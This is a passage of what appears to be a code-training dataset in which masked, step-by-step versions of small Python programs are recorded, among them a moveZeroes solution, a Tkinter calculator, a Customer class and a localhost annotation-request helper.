"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\n<mask token>\nprint(s.moveZeroes(nums))\n",
"step-4": "<mask token>\n\n\nclass Solution(object):\n\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j:\n if nums[i] == 0 and nums[j] != 0:\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0:\n i += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n\nnums = [-959151711, 623836953, 209446690, -1950418142, 1339915067, -\n 733626417, 481171539, -2125997010, -1225423476, 1462109565, 147434687, \n -1800073781, -1431212205, -450443973, 50097298, 753533734, -747189404, \n -2070885638, 0, -1484353894, -340296594, -2133744570, 619639811, -\n 1626162038, 669689561, 0, 112220218, 502447212, -787793179, 0, -\n 726846372, -1611013491, 204107194, 1605165582, -566891128, 2082852116, \n 0, 532995238, -1502590712, 0, 2136989777, -2031153343, 371398938, -\n 1907397429, 342796391, 609166045, -2007448660, -1096076344, -323570318,\n 0, -2082980371, 2129956379, -243553361, -1549960929, 1502383415, 0, -\n 1394618779, 694799815, 78595689, -1439173023, -1416578800, 685225786, -\n 333502212, -1181308536, -380569313, 772035354, 0, -915266376, 663709718,\n 1443496021, -777017729, -883300731, -387828385, 1907473488, -725483724,\n -972961871, -1255712537, 383120918, 1383877998, 1722751914, 0, -\n 1156050682, 1952527902, -560244497, 1304305692, 1173974542, -1313227247,\n -201476579, -298899493, -1828496581, -1724396350, 1933643204, \n 1531804925, 1728655262, -955565449, 0, -69843702, -461760848, 268336768,\n 1446130876]\ns = Solution()\nprint(s.moveZeroes(nums))\n",
"step-5": "\"\"\"\nMAIN IDEA --> Keep 2 pointers. i points to current 0 element and j searches for first non zero element which comes after i.\nAs soon as we get a j, we swap i and j. So index i now becomes non zero. Now move i to next index i.e i+1 and now check if i \nis zero or non zero. If i is still zero, then again search for 1st non zero element represented by j and swap again.\nIf i is now non-zero then no need to swap we already have a non zero in the beginning of array, so we just move the pointer i forward\n\"\"\"\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n j = 1\n n = len(nums)\n while j < n and i < j: # j searches for the 1st non zero element after pointer i\n if nums[i] == 0 and nums[j] != 0: # If element at i is zero and j != 0, swap them\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j += 1\n continue\n if nums[i] != 0: # If i is not zero, then just increment both i and j\n i += 1\n #j += 1\n continue\n if nums[i] == 0 and nums[j] == 0:\n j += 1\n continue\n return nums\n\n \nnums = [-959151711,623836953,209446690,-1950418142,1339915067,-733626417,481171539,-2125997010,-1225423476,1462109565,147434687,-1800073781,-1431212205,-450443973,50097298,753533734,-747189404,-2070885638,0,-1484353894,-340296594,-2133744570,619639811,-1626162038,669689561,0,112220218,502447212,-787793179,0,-726846372,-1611013491,204107194,1605165582,-566891128,2082852116,0,532995238,-1502590712,0,2136989777,-2031153343,371398938,-1907397429,342796391,609166045,-2007448660,-1096076344,-323570318,0,-2082980371,2129956379,-243553361,-1549960929,1502383415,0,-1394618779,694799815,78595689,-1439173023,-1416578800,685225786,-333502212,-1181308536,-380569313,772035354,0,-915266376,663709718,1443496021,-777017729,-883300731,-387828385,1907473488,-725483724,-972961871,-1255712537,383120918,1383877998,1722751914,0,-1156050682,1952527902,-560244497,1304305692,1173974542,-1313227247,-201476579,-298899493,-1828496581,-1724396350,1933643204,1531804925,1728655262,-955565449,0,-69843702,-461760848,268336768,1446130876]\ns = Solution()\nprint(s.moveZeroes(nums))\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from dataclasses import dataclass
from models.user import User
class Customer(User):
def __init__(self, first_name: str, last_name: str, user_name: str, email: str, password: str):
super(Customer, self).__init__(first_name, last_name, user_name, email, password)
# def __str__(self):
# return f"'Firstname' : {self.get__first_name},"
|
normal
|
{
"blob_id": "254f34c923d49374e09b579c5bc1b17b8c69c0e4",
"index": 2661,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Customer(User):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Customer(User):\n\n def __init__(self, first_name: str, last_name: str, user_name: str,\n email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name,\n email, password)\n",
"step-4": "from dataclasses import dataclass\nfrom models.user import User\n\n\nclass Customer(User):\n\n def __init__(self, first_name: str, last_name: str, user_name: str,\n email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name,\n email, password)\n",
"step-5": "from dataclasses import dataclass\n\nfrom models.user import User\n\n\nclass Customer(User):\n def __init__(self, first_name: str, last_name: str, user_name: str, email: str, password: str):\n super(Customer, self).__init__(first_name, last_name, user_name, email, password)\n\n # def __str__(self):\n # return f\"'Firstname' : {self.get__first_name},\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import utilities
import sys
if __name__ == "__main__":
print('I am main!')
else:
print(__name__)
for i in range(0,6):
print(i)
mylist = [12, 13, 14, 13, 12]
print(mylist)
#Enter iterations to run [0-5]
#value = -1
value = 3
while (value not in range(0,6)):
try:
value = int(input('Enter #test runs [0-5]:'))
except ValueError:
print('Invalid value entered, retry')
print('Final value entered {}'.format(value))
dir(sys)
print('done!')
for i in mylist:
utilities.myfct(i, 'hi')
utilities.myfct1(i)
|
normal
|
{
"blob_id": "f218f47acfb078877645de26c64e57f92dbcd953",
"index": 8003,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\n<mask token>\nprint(mylist)\n<mask token>\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-3": "<mask token>\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\nmylist = [12, 13, 14, 13, 12]\nprint(mylist)\nvalue = 3\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-4": "import utilities\nimport sys\nif __name__ == '__main__':\n print('I am main!')\nelse:\n print(__name__)\nfor i in range(0, 6):\n print(i)\nmylist = [12, 13, 14, 13, 12]\nprint(mylist)\nvalue = 3\nwhile value not in range(0, 6):\n try:\n value = int(input('Enter #test runs [0-5]:'))\n except ValueError:\n print('Invalid value entered, retry')\nprint('Final value entered {}'.format(value))\ndir(sys)\nprint('done!')\nfor i in mylist:\n utilities.myfct(i, 'hi')\n utilities.myfct1(i)\n",
"step-5": "import utilities\r\nimport sys\r\n\r\nif __name__ == \"__main__\":\r\n print('I am main!')\r\nelse:\r\n print(__name__)\r\n\r\nfor i in range(0,6):\r\n print(i)\r\n \r\nmylist = [12, 13, 14, 13, 12]\r\nprint(mylist)\r\n\r\n#Enter iterations to run [0-5]\r\n#value = -1\r\nvalue = 3\r\nwhile (value not in range(0,6)):\r\n try:\r\n value = int(input('Enter #test runs [0-5]:'))\r\n except ValueError:\r\n print('Invalid value entered, retry')\r\nprint('Final value entered {}'.format(value))\r\n\r\ndir(sys)\r\nprint('done!')\r\nfor i in mylist:\r\n utilities.myfct(i, 'hi')\r\n utilities.myfct1(i)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global math
<|reserved_special_token_0|>
root.title('Calculator')
<|reserved_special_token_0|>
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
<|reserved_special_token_0|>
buttonClear.grid(row=1, column=0, columnspan=3)
<|reserved_special_token_0|>
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global math
root = Tk()
root.title('Calculator')
e = Entry(root, width=60, borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root, width=52, height=8, text='Clear', command=
button_clear)
buttonClear.grid(row=1, column=0, columnspan=3)
button7 = Button(root, width=16, height=8, text='7', command=lambda :
button_click(7)).grid(row=3, column=0)
button8 = Button(root, width=16, height=8, text='8', command=lambda :
button_click(8)).grid(row=3, column=1)
button9 = Button(root, width=16, height=8, text='9', command=lambda :
button_click(9)).grid(row=3, column=2)
button4 = Button(root, width=16, height=8, text='4', command=lambda :
button_click(4)).grid(row=4, column=0)
button5 = Button(root, width=16, height=8, text='5', command=lambda :
button_click(5)).grid(row=4, column=1)
button6 = Button(root, width=16, height=8, text='6', command=lambda :
button_click(6)).grid(row=4, column=2)
button1 = Button(root, width=16, height=8, text='1', command=lambda :
button_click(1)).grid(row=5, column=0)
button2 = Button(root, width=16, height=8, text='2', command=lambda :
button_click(2)).grid(row=5, column=1)
button3 = Button(root, width=16, height=8, text='3', command=lambda :
button_click(3)).grid(row=5, column=2)
button0 = Button(root, width=16, height=8, text='0', command=lambda :
button_click(0)).grid(row=6, column=0)
buttonEqual = Button(root, width=34, height=8, text='=', command=button_equal
).grid(row=6, column=1, columnspan=2)
buttonPlus = Button(root, width=16, height=8, text='+', command=button_add
).grid(row=7, column=0)
buttonSubtract = Button(root, width=16, height=8, text='-', command=
button_subtract).grid(row=7, column=1)
buttonMul = Button(root, width=16, height=8, text='*', command=button_multiply
).grid(row=7, column=2)
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
global math
root = Tk()
root.title('Calculator')
e = Entry(root, width=60, borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = 'addition'
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, f_num + int(second_number))
if math == 'subtraction':
e.insert(0, f_num - int(second_number))
if math == 'multiplication':
e.insert(0, f_num * int(second_number))
if math == 'division':
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = 'subtraction'
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = 'multiplication'
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = 'division'
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root, width=52, height=8, text='Clear', command=
button_clear)
buttonClear.grid(row=1, column=0, columnspan=3)
button7 = Button(root, width=16, height=8, text='7', command=lambda :
button_click(7)).grid(row=3, column=0)
button8 = Button(root, width=16, height=8, text='8', command=lambda :
button_click(8)).grid(row=3, column=1)
button9 = Button(root, width=16, height=8, text='9', command=lambda :
button_click(9)).grid(row=3, column=2)
button4 = Button(root, width=16, height=8, text='4', command=lambda :
button_click(4)).grid(row=4, column=0)
button5 = Button(root, width=16, height=8, text='5', command=lambda :
button_click(5)).grid(row=4, column=1)
button6 = Button(root, width=16, height=8, text='6', command=lambda :
button_click(6)).grid(row=4, column=2)
button1 = Button(root, width=16, height=8, text='1', command=lambda :
button_click(1)).grid(row=5, column=0)
button2 = Button(root, width=16, height=8, text='2', command=lambda :
button_click(2)).grid(row=5, column=1)
button3 = Button(root, width=16, height=8, text='3', command=lambda :
button_click(3)).grid(row=5, column=2)
button0 = Button(root, width=16, height=8, text='0', command=lambda :
button_click(0)).grid(row=6, column=0)
buttonEqual = Button(root, width=34, height=8, text='=', command=button_equal
).grid(row=6, column=1, columnspan=2)
buttonPlus = Button(root, width=16, height=8, text='+', command=button_add
).grid(row=7, column=0)
buttonSubtract = Button(root, width=16, height=8, text='-', command=
button_subtract).grid(row=7, column=1)
buttonMul = Button(root, width=16, height=8, text='*', command=button_multiply
).grid(row=7, column=2)
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
global math
root = Tk()
root.title("Calculator")
e = Entry(root,width=60,borderwidth=5)
e.grid(columnspan=3)
def button_click(number):
#e.delete(0, END)
current = e.get()
e.delete(0, END)
e.insert(0, str(current) + str(number))
def button_clear():
e.delete(0, END)
def button_add():
first_number = e.get()
global f_num
global math
math = "addition"
f_num = int(first_number)
e.delete(0, END)
def button_equal():
second_number = e.get()
e.delete(0, END)
if math == "addition":
e.insert(0, f_num + int(second_number))
if math == "subtraction":
e.insert(0, f_num - int(second_number))
if math == "multiplication":
e.insert(0, f_num * int(second_number))
if math == "division":
e.insert(0, f_num / int(second_number))
def button_subtract():
first_number = e.get()
global f_num
global math
math = "subtraction"
f_num = int(first_number)
e.delete(0, END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = "multiplication"
f_num = int(first_number)
e.delete(0, END)
def button_divide():
first_number = e.get()
global f_num
global math
math = "division"
f_num = int(first_number)
e.delete(0, END)
buttonClear = Button(root,width=52,height=8,text="Clear",command=button_clear)
buttonClear.grid(row=1,column=0,columnspan=3)
button7 = Button(root,width=16,height=8,text="7",command=lambda: button_click(7)).grid(row=3,column=0)
button8 = Button(root,width=16,height=8,text="8",command=lambda: button_click(8)).grid(row=3,column=1)
button9 = Button(root,width=16,height=8,text="9",command=lambda: button_click(9)).grid(row=3,column=2)
button4 = Button(root,width=16,height=8,text="4",command=lambda: button_click(4)).grid(row=4,column=0)
button5 = Button(root,width=16,height=8,text="5",command=lambda: button_click(5)).grid(row=4,column=1)
button6 = Button(root,width=16,height=8,text="6",command=lambda: button_click(6)).grid(row=4,column=2)
button1 = Button(root,width=16,height=8,text="1",command=lambda: button_click(1)).grid(row=5,column=0)
button2 = Button(root,width=16,height=8,text="2",command=lambda: button_click(2)).grid(row=5,column=1)
button3 = Button(root,width=16,height=8,text="3",command=lambda: button_click(3)).grid(row=5,column=2)
button0 = Button(root,width=16,height=8,text="0",command=lambda: button_click(0)).grid(row=6,column=0)
buttonEqual = Button(root,width=34,height=8,text="=",command=button_equal).grid(row=6,column=1,columnspan=2)
buttonPlus = Button(root,width=16,height=8,text="+",command=button_add).grid(row=7,column=0)
buttonSubtract = Button(root,width=16,height=8,text="-",command=button_subtract).grid(row=7,column=1)
buttonMul = Button(root,width=16,height=8,text="*",command=button_multiply).grid(row=7,column=2)
root.mainloop()
|
flexible
|
{
"blob_id": "e6320bc1c344c87818a4063616db0c63b7b8be49",
"index": 1294,
"step-1": "<mask token>\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\n<mask token>\n",
"step-2": "<mask token>\nglobal math\n<mask token>\nroot.title('Calculator')\n<mask token>\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\n<mask token>\nbuttonClear.grid(row=1, column=0, columnspan=3)\n<mask token>\nroot.mainloop()\n",
"step-3": "<mask token>\nglobal math\nroot = Tk()\nroot.title('Calculator')\ne = Entry(root, width=60, borderwidth=5)\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\nbuttonClear = Button(root, width=52, height=8, text='Clear', command=\n button_clear)\nbuttonClear.grid(row=1, column=0, columnspan=3)\nbutton7 = Button(root, width=16, height=8, text='7', command=lambda :\n button_click(7)).grid(row=3, column=0)\nbutton8 = Button(root, width=16, height=8, text='8', command=lambda :\n button_click(8)).grid(row=3, column=1)\nbutton9 = Button(root, width=16, height=8, text='9', command=lambda :\n button_click(9)).grid(row=3, column=2)\nbutton4 = Button(root, width=16, height=8, text='4', command=lambda :\n button_click(4)).grid(row=4, column=0)\nbutton5 = Button(root, width=16, height=8, text='5', command=lambda :\n button_click(5)).grid(row=4, column=1)\nbutton6 = Button(root, width=16, height=8, text='6', command=lambda :\n button_click(6)).grid(row=4, column=2)\nbutton1 = Button(root, width=16, height=8, text='1', command=lambda :\n button_click(1)).grid(row=5, column=0)\nbutton2 = Button(root, width=16, height=8, text='2', command=lambda :\n button_click(2)).grid(row=5, column=1)\nbutton3 = Button(root, width=16, height=8, text='3', command=lambda :\n button_click(3)).grid(row=5, column=2)\nbutton0 = Button(root, width=16, height=8, text='0', command=lambda :\n button_click(0)).grid(row=6, column=0)\nbuttonEqual = Button(root, width=34, height=8, text='=', command=button_equal\n ).grid(row=6, column=1, columnspan=2)\nbuttonPlus = Button(root, width=16, height=8, text='+', command=button_add\n ).grid(row=7, column=0)\nbuttonSubtract = Button(root, width=16, height=8, text='-', command=\n button_subtract).grid(row=7, column=1)\nbuttonMul = Button(root, width=16, height=8, text='*', command=button_multiply\n ).grid(row=7, column=2)\nroot.mainloop()\n",
"step-4": "from tkinter import *\nglobal math\nroot = Tk()\nroot.title('Calculator')\ne = Entry(root, width=60, borderwidth=5)\ne.grid(columnspan=3)\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n\n\ndef button_clear():\n e.delete(0, END)\n\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = 'addition'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, f_num + int(second_number))\n if math == 'subtraction':\n e.insert(0, f_num - int(second_number))\n if math == 'multiplication':\n e.insert(0, f_num * int(second_number))\n if math == 'division':\n e.insert(0, f_num / int(second_number))\n\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = 'subtraction'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = 'multiplication'\n f_num = int(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = 'division'\n f_num = int(first_number)\n e.delete(0, END)\n\n\nbuttonClear = Button(root, width=52, height=8, text='Clear', command=\n button_clear)\nbuttonClear.grid(row=1, column=0, columnspan=3)\nbutton7 = Button(root, width=16, height=8, text='7', command=lambda :\n button_click(7)).grid(row=3, column=0)\nbutton8 = Button(root, width=16, height=8, text='8', command=lambda :\n button_click(8)).grid(row=3, column=1)\nbutton9 = Button(root, width=16, height=8, text='9', command=lambda :\n button_click(9)).grid(row=3, column=2)\nbutton4 = Button(root, width=16, height=8, text='4', command=lambda :\n button_click(4)).grid(row=4, column=0)\nbutton5 = Button(root, width=16, height=8, text='5', command=lambda :\n button_click(5)).grid(row=4, column=1)\nbutton6 = Button(root, width=16, height=8, text='6', command=lambda :\n button_click(6)).grid(row=4, column=2)\nbutton1 = Button(root, width=16, height=8, text='1', command=lambda :\n button_click(1)).grid(row=5, column=0)\nbutton2 = Button(root, width=16, height=8, text='2', command=lambda :\n button_click(2)).grid(row=5, column=1)\nbutton3 = Button(root, width=16, height=8, text='3', command=lambda :\n button_click(3)).grid(row=5, column=2)\nbutton0 = Button(root, width=16, height=8, text='0', command=lambda :\n button_click(0)).grid(row=6, column=0)\nbuttonEqual = Button(root, width=34, height=8, text='=', command=button_equal\n ).grid(row=6, column=1, columnspan=2)\nbuttonPlus = Button(root, width=16, height=8, text='+', command=button_add\n ).grid(row=7, column=0)\nbuttonSubtract = Button(root, width=16, height=8, text='-', command=\n button_subtract).grid(row=7, column=1)\nbuttonMul = Button(root, width=16, height=8, text='*', command=button_multiply\n ).grid(row=7, column=2)\nroot.mainloop()\n",
"step-5": "from tkinter import *\r\n\r\nglobal math\r\n\r\nroot = Tk()\r\n\r\nroot.title(\"Calculator\")\r\n\r\ne = Entry(root,width=60,borderwidth=5)\r\ne.grid(columnspan=3)\r\n\r\ndef button_click(number):\r\n\t#e.delete(0, END)\r\n\tcurrent = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(current) + str(number))\r\n\r\ndef button_clear():\r\n\te.delete(0, END)\r\n\r\n\r\ndef button_add():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\r\n\tsecond_number = e.get()\r\n\te.delete(0, END)\r\n\t\r\n\tif math == \"addition\":\r\n\t\te.insert(0, f_num + int(second_number))\r\n\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, f_num - int(second_number))\r\n\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, f_num * int(second_number))\r\n\r\n\tif math == \"division\":\r\n\t\te.insert(0, f_num / int(second_number))\r\n\r\ndef button_subtract():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_multiply():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_divide():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tf_num = int(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\n\r\nbuttonClear = Button(root,width=52,height=8,text=\"Clear\",command=button_clear)\r\nbuttonClear.grid(row=1,column=0,columnspan=3)\r\n\r\nbutton7 = Button(root,width=16,height=8,text=\"7\",command=lambda: button_click(7)).grid(row=3,column=0)\r\nbutton8 = Button(root,width=16,height=8,text=\"8\",command=lambda: button_click(8)).grid(row=3,column=1)\r\nbutton9 = Button(root,width=16,height=8,text=\"9\",command=lambda: button_click(9)).grid(row=3,column=2)\r\n\r\nbutton4 = Button(root,width=16,height=8,text=\"4\",command=lambda: button_click(4)).grid(row=4,column=0)\r\nbutton5 = Button(root,width=16,height=8,text=\"5\",command=lambda: button_click(5)).grid(row=4,column=1)\r\nbutton6 = Button(root,width=16,height=8,text=\"6\",command=lambda: button_click(6)).grid(row=4,column=2)\r\n\r\nbutton1 = Button(root,width=16,height=8,text=\"1\",command=lambda: button_click(1)).grid(row=5,column=0)\r\nbutton2 = Button(root,width=16,height=8,text=\"2\",command=lambda: button_click(2)).grid(row=5,column=1)\r\nbutton3 = Button(root,width=16,height=8,text=\"3\",command=lambda: button_click(3)).grid(row=5,column=2)\r\n\r\n\r\nbutton0 = Button(root,width=16,height=8,text=\"0\",command=lambda: button_click(0)).grid(row=6,column=0)\r\nbuttonEqual = Button(root,width=34,height=8,text=\"=\",command=button_equal).grid(row=6,column=1,columnspan=2)\r\n\r\nbuttonPlus = Button(root,width=16,height=8,text=\"+\",command=button_add).grid(row=7,column=0)\r\nbuttonSubtract = Button(root,width=16,height=8,text=\"-\",command=button_subtract).grid(row=7,column=1)\r\nbuttonMul = Button(root,width=16,height=8,text=\"*\",command=button_multiply).grid(row=7,column=2)\r\n\r\nroot.mainloop()",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequestAnnotation:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequestAnnotation:
def schedule(self, command: str, **kwargs):
response = requests.post(url=
f'http://localhost:{config.annotation_port}/{command}', json=kwargs
)
return json.loads(response.text)
<|reserved_special_token_1|>
import json
import requests
import config
class RequestAnnotation:
def schedule(self, command: str, **kwargs):
response = requests.post(url=
f'http://localhost:{config.annotation_port}/{command}', json=kwargs
)
return json.loads(response.text)
<|reserved_special_token_1|>
import json
import requests
import config
class RequestAnnotation:
def schedule(self,
command: str,
**kwargs):
response = requests.post(url=f"http://localhost:{config.annotation_port}/{command}",
json=kwargs)
# not 'text' for annotating, but 'text' of response is meant here:
return json.loads(response.text)
|
flexible
|
{
"blob_id": "6782761bcbf53ea5076b6dfb7de66d0e68a9f45d",
"index": 3123,
"step-1": "<mask token>\n",
